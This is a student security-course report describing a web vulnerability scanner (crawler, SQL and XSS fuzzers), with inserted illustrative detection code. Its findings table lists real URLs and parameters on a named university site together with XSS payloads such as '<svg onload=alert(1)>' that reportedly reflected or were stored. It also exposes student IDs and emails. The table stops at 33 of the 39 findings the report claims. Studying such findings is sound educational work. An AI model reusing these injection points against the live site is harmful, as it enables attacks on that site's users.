# CS5439 Assignment 2 Report (Team 11)
| Name | Lyu Siqing | Liu Jiahao | Jiang Yuancheng | Kang Anming |
| --- | -------------------- | ------------------- | ------------------ | ------------------ |
| StudentID | A0224929W | A0219076B | A0213812R | A0162494Y |
| Email | siqing.lyu@u.nus.edu | jiahaoliu@u.nus.edu | e0509851@u.nus.edu | e0134081@u.nus.edu |
## Introduction
Websites and web applications are just as prone to security breaches as physical homes, stores, and government infrastructure. Many critical websites contain vulnerabilities, including the [Mysoc website](https://mysoc.nus.edu.sg/) of our department. In this project, we build a web vulnerability scanner, WEBScanner, that detects typical vulnerabilities such as SQL injection and Cross-Site Scripting (XSS). At the end of this report, we evaluate our tool on the results of experiments against the [Mysoc website](https://mysoc.nus.edu.sg/).
## WEBScanner
### Web Crawler
#### Introduction and Mechanism
The Web Crawler is the foundation of WEBScanner: it collects from the target website the URLs that the fuzzers later test. The basic mechanism of the crawler is shown below:
```mermaid
graph LR
url --> get_all_requests
get_all_requests --> form_parser
get_all_requests --> suburl_searcher
form_parser --> new_requests
suburl_searcher --> new_requests
new_requests --> requests_list
new_requests --> get_all_requests
```
To explain its mechanism better, one recursion step is as follows. The input of the crawler is a URL (and cookies if needed).
- The crawler visits the given URL and collects information about all URLs, forms and buttons on the page.
- The crawler stores the collected items by category, e.g. `GET_ITEM`, `POST_ITEM`.
- The crawler visits one of the URLs acquired in the first step and repeats the process recursively until there are no new URLs to store.
We designed a general Web Crawler that supports collecting URLs from different kinds of websites. The fuzzers are then used to check whether the given website has vulnerabilities such as SQL injection, XSS and directory traversal.
#### Implementation
The input structure of the Web Crawler is (url, cookies). First, it sends a request to the given URL to retrieve the page content and searches for sub-URLs in the page. The crawler acquires the three kinds of URL reference defined in the W3C standards: fragment references (`#` type), path references (`/` type) and URLs carrying browser parameters, i.e. URLs with a question mark in them.
The output of the crawler is as follows:
- `URL_1 = [url, http method, browser parameters]`
- `return_list = [URL_1, URL_2, ......]`
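The per-page extraction step and the recursion loop described above, as an added example that is not the team's code. It assumes a fake site held in a dictionary (`FAKE_SITE`, constructed here so the example runs offline; `fetch` is any callable returning a page body, so a real HTTP client can be passed instead), handles the three link kinds (`#`, `/`, and `?`-query URLs) plus forms, and emits entries in the `[url, http method, browser parameters]` shape; `javascript:` links are skipped, which is exactly the gap noted in the summary of this report.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit, parse_qsl


class _PageParser(HTMLParser):
    """Collects <a href> targets and <form> definitions from one HTML page."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").upper(),
                          "params": {}}
        elif tag in ("input", "textarea", "select") and self._form is not None:
            if a.get("name"):
                self._form["params"][a["name"]] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def extract_requests(page_url, body):
    """One page -> list of [url, method, params]; stays on the page's host."""
    parser = _PageParser()
    parser.feed(body)
    host = urlsplit(page_url).netloc
    found, seen = [], set()

    def add(url, method, params):
        key = (url, method, tuple(sorted(params)))
        if key not in seen:
            seen.add(key)
            found.append([url, method, params])

    for href in parser.links:
        if href.lower().startswith(("javascript:", "mailto:")):
            continue  # not an HTTP request the fuzzers could replay
        parts = urlsplit(urljoin(page_url, href))  # resolves '#', '/', '?' forms
        if parts.netloc != host:
            continue  # out of scope
        bare = parts._replace(query="", fragment="").geturl()
        add(bare, "GET", dict(parse_qsl(parts.query, keep_blank_values=True)))

    for form in parser.forms:
        target = urljoin(page_url, form["action"]) if form["action"] else page_url
        add(target, form["method"], form["params"])
    return found


def crawl(start_url, fetch, max_pages=100):
    """Recursion loop: follow every new GET URL until none remain."""
    to_visit, visited, collected, seen = [start_url], set(), [], set()
    while to_visit and len(visited) < max_pages:
        url = to_visit.pop(0)
        if url in visited:
            continue
        visited.add(url)
        body = fetch(url)
        if body is None:
            continue
        for req in extract_requests(url, body):
            key = (req[0], req[1], tuple(sorted(req[2])))
            if key in seen:
                continue
            seen.add(key)
            collected.append(req)
            if req[1] == "GET" and req[0] not in visited:
                to_visit.append(req[0])
    return collected


# Constructed sample site (hypothetical host example.test), served from memory.
BASE = "https://example.test/app/index.php"
SAMPLE_HTML = """<html><body>
<a href="#top">Top</a>
<a href="/app/list.php">List</a>
<a href="view.php?id=7&mode=full">View</a>
<a href="javascript:void(0)">Nothing</a>
<a href="https://other.example/x">External</a>
<form action="search.php" method="post">
  <input type="text" name="q" value="">
  <input type="hidden" name="page" value="1">
  <input type="submit" name="submit" value="Go">
</form></body></html>"""
FAKE_SITE = {
    BASE: SAMPLE_HTML,
    "https://example.test/app/list.php": '<a href="view.php?id=1">one</a><a href="index.php">home</a>',
    "https://example.test/app/view.php": "<p>no links</p>",
    "https://example.test/app/search.php": "<p>results</p>",
}

if __name__ == "__main__":
    for entry in crawl(BASE, FAKE_SITE.get):
        print(entry)
```

Deduplication is keyed on (url, method, parameter names) rather than on parameter values, so `view.php?id=1` and `view.php?id=7` count as one request to fuzz, which keeps the output list short on listing pages.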
### SQL Fuzzer
#### Introduction and Mechanism
The SQL fuzzer is one component of WEBScanner. Its function is to test whether a given URL, for either the POST or the GET method, has a SQL injection vulnerability.
After receiving a URL list as input, the SQL fuzzer tries SQL injection strings for different database engines and several injection techniques. We detect SQL injection by response-length comparison, error-based injection and time-based injection (when the network is stable enough for timing to be meaningful).
#### Implementation
The fuzzer takes the output of the Web Crawler as its input. For each request, the fuzzer appends a SQL injection string to each parameter; by comparing the responses, we can tell whether the website handled the illegal request correctly. Part of the response-behaviour list we defined is as follows:
**Normal behaviors**
- Return with error code like 404, 403
- No matter what SQL injection we made, return blank page
- No response (dropped our requests)
- Return a page in which the injected string was filtered, e.g. given `a.com/?id=1%27+and+1%3d1+--+-`, the site answers as for `a.com/?id=1`
**Abnormal behavior**
- Returned normally and applied injected SQL
- Returned a database error, e.g. `MySQL Error 1264: out of range value for column`
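The response classification above, as an added example that is not the team's code. It works only on responses (no injection strings appear in it): a `Response` record (status, body, elapsed seconds; `status=None` models a dropped request) is compared against the baseline response of the unmodified request, the database-error signatures are a small constructed list of well-known engine messages, and the thresholds (`time_delay`, `tolerance`) are assumed values. The boolean check implements the length comparison the report mentions: injection is reported only when a TRUE condition leaves the page unchanged and a FALSE condition changes it.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed signature list: common error strings leaked by database drivers.
DB_ERROR_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"you have an error in your sql syntax",
    r"warning:\s*mysqli?_",
    r"mysql error \d+",
    r"unclosed quotation mark after the character string",
    r"ora-\d{5}",
    r"pg_query\(\)",
    r"sqlite3?::|sqlite_error",
)]


@dataclass
class Response:
    status: Optional[int]   # None = no response (request dropped)
    body: str
    elapsed: float = 0.0    # seconds until the response arrived


def is_db_error(body):
    return any(p.search(body) for p in DB_ERROR_PATTERNS)


def similar_length(a, b, tolerance=0.1):
    """True when two bodies differ in length by at most `tolerance` (relative)."""
    longest = max(len(a), len(b), 1)
    return abs(len(a) - len(b)) / longest <= tolerance


def classify(baseline, probe, *, time_delay=5.0):
    """Map one probe response onto the normal/abnormal behaviour list."""
    if probe.status is None:
        return "normal", "no response (request dropped)"
    if probe.status in (403, 404):
        return "normal", f"error code {probe.status}"
    if not probe.body.strip():
        return "normal", "blank page"
    if is_db_error(probe.body):                      # error-based detection
        return "abnormal", "database error leaked"
    if probe.elapsed - baseline.elapsed >= time_delay:  # time-based detection
        return "abnormal", "time-based delay"
    if probe.body == baseline.body:
        return "normal", "injected string filtered (same page as baseline)"
    return "undetermined", "response differs; run the boolean pair check"


def boolean_injection(baseline, true_probe, false_probe, tolerance=0.1):
    """Length comparison: TRUE condition ~ baseline, FALSE condition != baseline."""
    return (similar_length(baseline.body, true_probe.body, tolerance)
            and not similar_length(baseline.body, false_probe.body, tolerance))


# Constructed sample responses.
BASELINE = Response(200, "<html>" + "<li>item</li>" * 20 + "</html>", 0.2)
ERROR_PAGE = Response(200, "Warning: mysqli_fetch_array() ... MySQL Error 1264: "
                           "Out of range value for column 'id'", 0.2)
FILTERED = Response(200, BASELINE.body, 0.2)
NOT_FOUND = Response(404, "Not Found", 0.1)
DROPPED = Response(None, "", 0.0)
SLOW = Response(200, BASELINE.body, 6.1)
TRUE_PROBE = Response(200, BASELINE.body, 0.2)
FALSE_PROBE = Response(200, "<html></html>", 0.2)

if __name__ == "__main__":
    for name, r in [("error", ERROR_PAGE), ("filtered", FILTERED), ("404", NOT_FOUND),
                    ("dropped", DROPPED), ("slow", SLOW)]:
        print(name, classify(BASELINE, r))
    print("boolean pair:", boolean_injection(BASELINE, TRUE_PROBE, FALSE_PROBE))
```

The time-based branch only makes sense with a stable baseline; in practice the baseline should be measured several times and the slowest value used, otherwise ordinary network jitter is reported as a finding.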
### XSS Fuzzer
#### Introduction and Mechanism
Like the SQL fuzzer, our XSS fuzzer is a component of WEBScanner and fuzzes the output of the Web Crawler. The XSS fuzzer assigns malicious values to each parameter, makes HTTP requests and inspects the responses. Of the various types of XSS (stored, reflected and DOM-based), our focus is stored and reflected XSS.
In WEBScanner, the XSS fuzzer component works as an API that receives well-formatted and pre-processed data from the Web Crawler. Besides, we also implemented a standalone XSS fuzzer that can take more crude input.
#### Implementation
The fuzzer takes the output of the Web Crawler as its input. Given a URL, the corresponding HTTP method (POST or GET), a set of URL parameters (key-value pairs, sometimes called "queries") and cookies, the fuzzer replaces the value of each parameter with a payload. After making HTTP requests with the modified parameters, the fuzzer inspects the responses to see whether the payload is reflected (i.e. appears in the response).
The standalone XSS fuzzer takes a raw URL and cookies as input, then fuzzes the URL parameters and any forms on the web page.
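The inspection step, as an added example that is not the team's code and uses no executable payload: each parameter of a crawled request gets its own alphanumeric canary wrapped in angle brackets, so that a later page can be checked for three states, the brackets surviving raw (the output is not encoded), the text reflected but neutralised, or no reflection at all. Because the canary is derived from (method, URL, parameter name), a canary found on any later page can be traced back to the parameter that stored it, which is the stored-XSS case. Names, the `example.test` URL and the sample page are assumptions constructed for the example.

```python
import hashlib
import html


def make_canary(url, method, param):
    """Deterministic, alphanumeric marker unique to one (request, parameter)."""
    digest = hashlib.sha256(f"{method} {url} {param}".encode()).hexdigest()[:10]
    return f"zz{digest}zz"


def build_probes(url, method, params):
    """One probe per parameter: only that parameter carries '<canary>',
    all other parameters keep their crawled values."""
    probes = []
    for name in params:
        canary = make_canary(url, method, name)
        modified = dict(params)
        modified[name] = f"<{canary}>"
        probes.append((name, canary, modified))
    return probes


def reflection_state(body, canary):
    """'raw' = markup came back unencoded (finding), 'neutralised' = text
    reflected with brackets encoded or stripped, 'none' = not reflected."""
    probe = f"<{canary}>"
    if probe in body:
        return "raw"
    if html.escape(probe) in body or canary in body:
        return "neutralised"
    return "none"


def attribute_reflections(body, probes):
    """Scan any page (the response itself, or a later page for stored XSS)
    and report which parameter each reflected canary belongs to."""
    report = []
    for name, canary, _ in probes:
        state = reflection_state(body, canary)
        if state != "none":
            report.append((name, state))
    return report


# Constructed request (shape produced by the crawler) and a constructed
# page that echoes one field raw and one field HTML-encoded.
URL = "https://example.test/app/form.php"
PARAMS = {"F_name": "", "F_email": "", "submit": "Continue"}
PROBES = build_probes(URL, "POST", PARAMS)
NAME_CANARY, EMAIL_CANARY = PROBES[0][1], PROBES[1][1]
SAMPLE_PAGE = (f"<p>Name: <{NAME_CANARY}></p>"
               f"<p>Email: &lt;{EMAIL_CANARY}&gt;</p>")

if __name__ == "__main__":
    print(attribute_reflections(SAMPLE_PAGE, PROBES))
```

A "raw" state only means the brackets were not encoded in that location; whether it is exploitable still depends on the surrounding context (attribute, script, or text node), which is why XSStrike, discussed later in this report, parses the response context before choosing a payload.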
## Experiments and Analysis
To evaluate WEBScanner, we used it to test the [Mysoc Website](https://mysoc.nus.edu.sg/). Our test found many vulnerabilities in the [Mysoc Website](https://mysoc.nus.edu.sg/).
Findings No. 1 and No. 2 are reflected XSS.
Findings No. 3 to No. 39 are very likely stored XSS.
| INDEX | URL | GET(0)<br/>POST(1) | PAYLOAD |
| ----- | -------------------------------------------------------- | -------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1 | 'https://mysoc.nus.edu.sg/~phdexam/student/index.php' | 0 | {'appn_id': '\<svg onload=alert(1)>'} |
| 2 | 'https://mysoc.nus.edu.sg/app/phdexam/student/index.php' | 0 | {'appn_id': '\<svg onload=alert(1)>'} |
| 3 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '\<svg onload=teste0509851test>', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 4 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '\<svg onload=teste0509851test>', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 5 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '\<svg onload=teste0509851test>', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 6 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '\<svg onload=teste0509851test>', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 7 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '\<svg onload=teste0509851test>', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 8 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '\<svg onload=teste0509851test>', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 9 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '\<svg onload=teste0509851test>', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 10 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '\<svg onload=teste0509851test>', 'F_email': 'YES', 'submit': 'Continue'} |
| 11 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '\<svg onload=teste0509851test>', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 12 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '\<svg onload=teste0509851test>', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 13 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '\<svg onload=teste0509851test>', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 14 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '\<svg onload=teste0509851test>', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 15 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '\<svg onload=teste0509851test>', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 16 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '\<svg onload=teste0509851test>', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 17 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '\<svg onload=teste0509851test>', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 18 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '\<svg onload=teste0509851test>', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 19 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '\<svg onload=teste0509851test>', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} |
| 20 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '\<svg onload=teste0509851test>', 'F_email': 'YES', 'submit': 'Continue'} |
| 21 | 'https://mysoc.nus.edu.sg/app/eform/forms/formC_1.php' | 1 | {'soc_id': '\<svg onload=teste0509851test>', 'F_per_type': 'ug', 'F_resource_c': 'L01', 'F_pi_id': '', 'Submit': 'Submit'} |
| 22 | 'https://mysoc.nus.edu.sg/app/eform/forms/formC_1.php' | 1 | {'soc_id': 'e0509851', 'F_per_type': 'ug', 'F_resource_c': 'L01', 'F_pi_id': '\<svg onload=teste0509851test>', 'Submit': 'Submit'} |
| 23 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '\<svg onload=teste0509851test>', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': 'e0509851', None: 'Go', 'F_start_d': '', 'F_end_d': '', 'F_pi_id': '', 'F_pc': '', 'Submit': 'Submit'} |
| 24 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': '\<svg onload=teste0509851test>', None: 'Go', 'F_start_d': '', 'F_end_d': '', 'F_pi_id': '', 'F_pc': '', 'Submit': 'Submit'} |
| 25 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': 'e0509851', None: 'Go', 'F_start_d': '\<svg onload=teste0509851test>', 'F_end_d': '', 'F_pi_id': '', 'F_pc': '', 'Submit': 'Submit'} |
| 26 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': 'e0509851', None: 'Go', 'F_start_d': '', 'F_end_d': '\<svg onload=teste0509851test>', 'F_pi_id': '', 'F_pc': '', 'Submit': 'Submit'} |
| 27 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': 'e0509851', None: 'Go', 'F_start_d': '', 'F_end_d': '', 'F_pi_id': '\<svg onload=teste0509851test>', 'F_pc': '', 'Submit': 'Submit'} |
| 28 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '\<svg onload=teste0509851test>', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} |
| 29 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '\<svg onload=teste0509851test>', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} |
| 30 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '\<svg onload=teste0509851test>', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} |
| 31 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '\<svg onload=teste0509851test>', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} |
| 32 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '\<svg onload=teste0509851test>', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} |
| 33 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '\<svg onload=teste0509851test>', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} |
